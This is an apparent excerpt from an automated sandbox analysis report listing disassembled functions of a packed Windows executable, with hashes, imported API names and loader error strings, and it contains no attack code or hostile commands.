                                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                                                    • Instruction ID: abeacb111e894366aa60b87f059ba1fae5953056e90edd1bfd360b0f05b37e01
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C410322714A9482EF04EF2AE914169B3A2BB48FE4B899437DE4DA7F54EF7CC451C310
                                                                                                                                                                                                                                                                    Function 00007FF7C2678154 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                                    • Instruction ID: ddf653c4c20090707462923c6116c6c555012c4835dc6013f5b92bbcaab8c869
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D831C432B18B4281E754BF25744013DA696AF84BA0F944238EADD63FD5DF7CD801D324
                                                                                                                                                                                                                                                                    Function 00007FF7C26895E0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                                                    • Instruction ID: 56f793aae0d201c7bbf6eeed329dfeed23f16440cb7575140ceff2c0fa2710f1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3F044717182A58ADBA89F69A402629B7D1F7483D0F908039D5C983F04DB7C9061CF24
                                                                                                                                                                                                                                                                    Function 00007FF7C266D37C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                                                    • Instruction ID: f785e3ceab1f783541610a07cb0be301756ccaa23c41d077ab108202e995945e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92A0022590CC0AD0E644AF11E8E1035A332FB52330FC40031E18DB5AB0AFBCA400D335
                                                                                                                                                                                                                                                                    Function 00007FF7C26676B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                    • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                                    • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                                    • Instruction ID: 306ba11d9e9725e2f8d414c8a1269bf14dfd424d964dc69a7746be179d1449be
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86028028A0DB8BD1EA55BF65A810974E2A3BF04775FD40135D49E62BA0EFFCA548C334
                                                                                                                                                                                                                                                                    Function 00007FF7C26681C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2669400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C26645E4,00000000,00007FF7C2661985), ref: 00007FF7C2669439
                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7C26688A7,?,?,00000000,00007FF7C2663CBB), ref: 00007FF7C266821C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662810: MessageBoxW.USER32 ref: 00007FF7C26628EA
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                                    • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                                    • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                                    • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                                                    • Instruction ID: 85ed38db19c7a4a2bdf58e851b1d06c7e56c01a1d69b3130a42f58656636a00b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D518751A1864291FB50BF31E8556BAE273AF947A0FC44031D58EA6F95EEBCE408C374
                                                                                                                                                                                                                                                                    Function 00007FF7C2662180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                                    • String ID: P%
                                                                                                                                                                                                                                                                    • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                                    • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                    • Instruction ID: fe2e289fce019b1a42e0a73b8978909a0e3183056485ac487edc92353faf8931
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0651F826604BA186D6349F36E4181BAF7A2F798B61F004125EFDE83B95DF7CD045DB20
                                                                                                                                                                                                                                                                    Function 00007FF7C26680B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                                    • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                                    • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                                    • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                                    • Instruction ID: 943e3dc65ce24df7ccebc768ef81b8a2eef069d0b423ea26c178f2d78258173f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8219B21B08642C1E7516F75E854179E272FF88BB0F984130DA9D93BA5DE7CD544C334
                                                                                                                                                                                                                                                                    Function 00007FF7C2676300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                                    • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                    • Instruction ID: 45cfd66363752524c2264dc62b9af40e5ded7360e43e65be339fb8b8f7423c06
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68125E62A0814386FB24BE15B1542B9B6A3FB40F64FD44135E6DA66FC4DBBCE580CB31
                                                                                                                                                                                                                                                                    Function 00007FF7C2671038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                    • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                    • Instruction ID: 8513f3dbb65ed212844400f80a2f7b3769c6d654bbd61cf483d7828a604a30d0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD126022E0C14386FB20BE19B054679A663EB50F64FD84076E6D966FC4DBBCE584DB30
                                                                                                                                                                                                                                                                    Function 00007FF7C2661050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                    • Opcode ID: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                                                                    • Instruction ID: 663c401b115724f4ced1b33431e9a565bbf00e481b73fbf9b67a2eb6e74f08e9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91419321B08A5282EA10FF16A8046B9E3A6BF45BE0FC44471ED8C67B95DFBCE145C774
                                                                                                                                                                                                                                                                    Function 00007FF7C2661470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                    • Opcode ID: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                                                                    • Instruction ID: 74630ec983ff8b59630089cc6483ce3fa238ccc11d678c6f5ce9123bb77f3583
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2418061A08A4285EB10FF25A4005B9E3A2AF44BA4FC44532ED8D67F95DFBCE541C738
                                                                                                                                                                                                                                                                    Function 00007FF7C266EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                    • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                                    • Instruction ID: e0a5bfe2948626145a018a2421533cd9bc3759e14cd9de75313a28f7ff616932
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FD1D272A087428AEB20AF65D4417ADB7B1FB447A8F400136EE8D67F99DF78E041C764
                                                                                                                                                                                                                                                                    Function 00007FF7C2662C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C2663706,?,00007FF7C2663804), ref: 00007FF7C2662C9E
                                                                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C2663706,?,00007FF7C2663804), ref: 00007FF7C2662D63
                                                                                                                                                                                                                                                                    • MessageBoxW.USER32 ref: 00007FF7C2662D99
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
